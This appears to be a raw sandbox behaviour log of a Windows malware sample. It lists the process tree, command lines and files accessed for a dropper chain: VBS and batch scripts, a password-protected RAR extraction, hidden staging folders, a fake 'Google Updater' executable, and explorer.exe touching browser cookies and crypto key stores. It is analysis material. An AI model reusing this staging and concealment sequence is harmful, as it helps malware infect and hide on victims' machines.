C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Windows\SysWOW64\ntmarta.dll
C:\Windows\SysWOW64\propsys.dll
C:\Windows\Registration\R000000000006.clb
C:\
C:\Windows\WindowsShell.Manifest
C:\LMPupdate\set
C:\Users\Administrator\Desktop\desktop.ini
C:\Users\Administrator\AppData
3252
Image Path
ping dhgfg sgudy
Files Accessed
C:\Windows\SysWOW64\rasadhlp.dll
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\wship6.dll
C:\Windows\SysWOW64\WSHTCPIP.DLL
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\ping.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\winnsi.dll
3224
Image Path
"unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar
Files Accessed
C:\Windows\SysWOW64\propsys.dll
C:\Windows\Registration\R000000000006.clb
C:\
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\uxtheme.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\LMPupdate\set
C:\Windows\SysWOW64\crypt32.dll
C:\Users\Administrator\Desktop\desktop.ini
C:\Users\Administrator\AppData
C:\Users\Administrator
C:\Users
C:\Users\desktop.ini
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Windows\SysWOW64\ntmarta.dll
C:\LMPupdate\set\43939237cx.rar
C:\LMPupdate\set\48551.bat
C:\LMPupdate\set\xc829374091FD.exe
C:\LMPupdate\set\3980392CV.vbs
3104
Image Path
timeout 5
Files Accessed
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\timeout.exe.mui
4000
Image Path
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"
Files Accessed
C:\Windows\SysWOW64\cmd.exe
Process Children
4080
Image Path
cmd /c ""C:\LMPupdate\set\48551.bat" "
Files Accessed
C:\LMPupdate\set\435246.vbs
C:\LMPupdate\set\unpakedree.exe
C:\LMPupdate\set\3980392CV.vbs
Process Children
2768
Image Path
attrib +s +h "C:\LMPupdate\set"
Files Accessed
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
C:\Windows\System32\shell32.dll
C:\Windows\System32\NlsLexicons0009.dll
C:\Windows\System32\NlsData0009.dll
C:\Windows\System32\NaturalLanguage6.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.ci
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.wid
C:\Users\Public\Desktop\desktop.ini
C:\Users\Public
C:\Users\Public\Documents\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\desktop.ini
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.wsb
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.dir
C:\Users\Administrator\AppData\LocalLow
C:\Users\Administrator\AppData\LocalLow\Sun
C:\Users\Administrator\AppData\LocalLow\Sun\Java
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework64
C:\Users\Administrator\AppData\Local\Microsoft\Windows\WER
C:\ProgramData\Microsoft\RAC
C:\Windows\SysWOW64\ulib.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\LMPupdate\set
C:\LMPupdate
C:\
C:\Windows\SysWOW64\en-US\attrib.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\sechost.dll
Process Children
1348
Image Path
"C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528
Files Accessed
C:\Windows\System32\mssprxy.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\System32\cryptbase.dll
C:\Windows\System32\rpcss.dll
1768
Image Path
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
Files Accessed
C:\Windows\System32\mapi32.dll
C:\Windows\System32\mssvp.dll
C:\Windows\System32\mssprxy.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\userenv.dll
C:\Windows\System32\cscobj.dll
C:\Windows\System32\cscapi.dll
2820
Image Path
timeout 2
Files Accessed
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Windows\SysWOW64\imm32.dll
2320
Image Path
xc829374091FD.exe /start
Files Accessed
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\sechost.dll
Process Children
3168
Image Path
xc829374091FD.exe /start
Process Children
2128
Image Path
C:\Windows\SysWOW64\explorer.exe
Files Accessed
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VBB46FVT\logout[1].php
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZQNBZ6B0\logout[1].php
C:\Windows\SysWOW64\ole32.dll
C:\Windows\SysWOW64\en-US\msctf.dll.mui
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64
C:\Windows
C:\
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\apphelp.dll
C:\Windows\SysWOW64\propsys.dll
C:\Windows\SysWOW64\secur32.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\SysWOW64\slc.dll
C:\Windows\SysWOW64\dwmapi.dll
C:\Windows\SysWOW64\powrprof.dll
C:\Windows\SysWOW64\uxtheme.dll
C:\Windows\SysWOW64\dui70.dll
C:\Windows\SysWOW64\duser.dll
C:\Windows\SysWOW64\ExplorerFrame.dll
C:\Windows\Fonts\StaticCache.dat
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\SysWOW64\samlib.dll
C:\Windows\SysWOW64\profapi.dll
C:\Windows\SysWOW64\ntmarta.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\sfc_os.dll
C:\Windows\SysWOW64\samcli.dll
C:\Windows\SysWOW64\wkscli.dll
C:\ProgramData\Google Updater 2.09
C:\ProgramData\Google Updater 2.09\3a1m9iqmu7mwag.exe
C:\ProgramData
C:\Windows\SysWOW64\wininet.dll
C:\Windows\SysWOW64\winrnr.dll
C:\Windows\SysWOW64\pnrpnsp.dll
C:\Windows\SysWOW64\NapiNSP.dll
C:\Windows\SysWOW64\nlaapi.dll
C:\Windows\SysWOW64\WSHTCPIP.DLL
C:\Windows\SysWOW64\wship6.dll
C:\Windows\SysWOW64\rasadhlp.dll
C:\Windows\SysWOW64\FWPUCLNT.DLL
C:\Windows\SysWOW64\winnsi.dll
C:\Windows\SysWOW64\IPHLPAPI.DLL
C:\Windows\SysWOW64\mswsock.dll
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\LocalLow\Sun\Java\Deployment\deployment.properties
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0NQY21LG\logout[1].php
C:\Windows\SysWOW64\SensApi.dll
C:\Windows\SysWOW64\ras
C:\Windows\SysWOW64\rtutils.dll
C:\Windows\SysWOW64\rasman.dll
C:\Windows\SysWOW64\rasapi32.dll
C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1118702447-2625566189-3437391212-500\a18ca4003deb042bbee7a40f15e1970b_d29292bc-6ac1-4095-a280-5613a9b5e8f4
C:\Windows\SysWOW64\userenv.dll
C:\Windows\SysWOW64\rsaenh.dll
Process Children
3676
Image Path
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe /suac
Files Accessed
C:\Windows\SysWOW64\imm32.dll
C:\Users\ADMINI~1\AppData\Local
C:\Users\ADMINI~1\AppData
C:\Users\ADMINI~1
C:\Users
C:\
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\apphelp.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe
3552
Image Path
"C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe"
Files Accessed
C:\Windows\Microsoft.NET\Framework64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\System32\sechost.dll
C:\Users\ADMINI~1\AppData\Local
C:\Users\ADMINI~1\AppData
C:\Users\ADMINI~1
C:\Users
C:\
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Windows\System32\apphelp.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config
C:\Windows\System32\msvcr110_clr0400.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe
C:\Windows\System32\imm32.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#
C:\Windows\System32\uxtheme.dll
C:\Windows\System32\cryptbase.dll
C:\Windows\System32\rpcss.dll
C:\Users\ADMINI~1\AppData\Local\Temp
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\comctl32.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\sortdefault.nlp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\nlssorting.dll
C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\GdiPlus.dll
C:\Windows\System32\tzres.dll
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\segoeui.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\StaticCache.dat
C:\Windows\Fonts\verdana.ttf
C:\Windows\Fonts\segoeuiz.ttf
C:\Windows\Fonts\segoeuii.ttf
C:\Windows\Fonts\segoeuib.ttf
C:\Windows\Fonts\verdanaz.ttf
C:\Windows\Fonts\verdanai.ttf
C:\Windows\Fonts\verdanab.ttf
C:\Windows\System32\WindowsCodecs.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arial.ttf
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
C:\Windows\System32\en-US\msctf.dll.mui
C:\Windows\System32\dwmapi.dll
2552
Image Path
taskkill /f /im unpakedree.exe
Files Accessed
C:\Windows\SysWOW64\secur32.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\SysWOW64\en-US\taskkill.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\dbghelp.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\wtsapi32.dll
C:\Windows\SysWOW64\framedynos.dll
C:\Windows\SysWOW64\ntdsapi.dll
C:\Windows\SysWOW64\wbem\fastprox.dll
C:\Windows\SysWOW64\wbem\wbemsvc.dll
C:\Windows\SysWOW64\RpcRtRemote.dll
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\wbemcomn.dll
C:\Windows\SysWOW64\wbem\wbemprox.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\SysWOW64\en-US\KernelBase.dll.mui
2796
Image Path
taskkill /f /im unpakedree.exe
Files Accessed
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\wbemcomn.dll
C:\Windows\SysWOW64\wbem\wbemprox.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\SysWOW64\en-US\KernelBase.dll.mui
C:\Windows\SysWOW64\en-US\taskkill.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\dbghelp.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\wtsapi32.dll
C:\Windows\SysWOW64\framedynos.dll
C:\Windows\SysWOW64\secur32.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\SysWOW64\ntdsapi.dll
C:\Windows\SysWOW64\wbem\fastprox.dll
C:\Windows\SysWOW64\wbem\wbemsvc.dll
C:\Windows\SysWOW64\RpcRtRemote.dll
2824
Image Path
attrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"
Files Accessed
C:\LMPupdate\set\xc829374091FD.exe
C:\LMPupdate\set
C:\LMPupdate
C:\Windows\SysWOW64\en-US\attrib.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\SysWOW64\ulib.dll
2292
Image Path
timeout 4
Files Accessed
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
4008
Image Path
timeout 6
Files Accessed
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
